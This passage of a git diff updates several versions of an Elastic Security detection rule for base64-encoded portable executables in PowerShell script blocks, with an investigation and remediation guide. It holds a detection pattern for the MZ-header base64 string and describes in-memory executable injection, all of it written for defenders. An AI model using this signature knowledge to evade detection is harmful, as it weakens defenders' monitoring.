detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_106.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_106.json index ce493975d00..efbf53ab51c 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_106.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_107.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_107.json index 1be08a57349..efcf8e50a1a 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_107.json +++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_107.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_108.json b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_108.json index d32c85f078b..258a1685f4a 100644 --- a/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/ad84d445-b1ce-4377-82d9-7c633f28bf9a_108.json @@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk, bypassing file-based security protections. These executables are generally base64 encoded.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell 